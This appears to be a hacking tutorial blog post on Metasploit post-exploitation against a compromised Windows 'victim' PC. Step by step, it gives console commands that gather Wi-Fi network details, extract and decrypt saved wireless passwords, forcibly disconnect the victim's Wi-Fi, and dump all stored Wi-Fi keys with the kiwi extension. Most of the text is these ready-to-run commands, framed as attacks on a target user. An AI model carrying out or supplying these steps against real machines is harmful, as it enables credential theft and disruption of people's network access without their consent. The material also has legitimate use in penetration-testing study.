Hello readers! Today you will be learning about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too.
First Hack the Victim PC Using Metasploit (tutorial how to hack remote pc) after that get admin access through Bypassuac (click here), once you have victim’s meterpreter session run given below post exploit one-by-one.
Get BSS information of a remote user’s Wi-Fi connection
This module gathers information about the wireless Basic Service Sets available to the victim machine.
e.g. this will give you SSID and other important information regarding wireless connection.
msf > use post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) > set session 5
msf post(wlan_bss_list) > exploit
From given below image you can observe that here it has found “5 networks” such as Pen lab, Sinos , Ignite and etc along with there basic details.
Get current Wi-Fi connection information of a remote user
This module gathers information about the current connection on each wireless lan interface on the target machine.
msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run
The given below image has disclose that “pen Lab” is the current connection though which victim is connected more over it has shown some basic details such as : MAC address of router, Security status, Authentication type and etc.
Get saved wireless LAN profile of a remote user
This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.
msf post> use post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit
From given below image you can see it has extracted the profile of wifi through which victim is connected moreover it has also decrypted the shared key (password). Hence you can confirm the password for “Pen Lab” is “[email protected]”.
Disconnect a remote user’s Wi-Fi connection
This module disconnects the current wireless network connection on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit
From given below image you can confirm that it is disconnecting the victim from current wireless network.
I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.
meterpreter > load kiwi
meterpreter > help
This will give you entire wireless connection list with passwords as well. VOILA! You got it right.
meterpreter > wifi_list
meterpreter > wifi_list_shared
Great!! From given below image you can confirm that it has dump all shared keys (password) and authentication of their respective SSID.
Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Hiddenramp as a Security Analyst. Connect with her here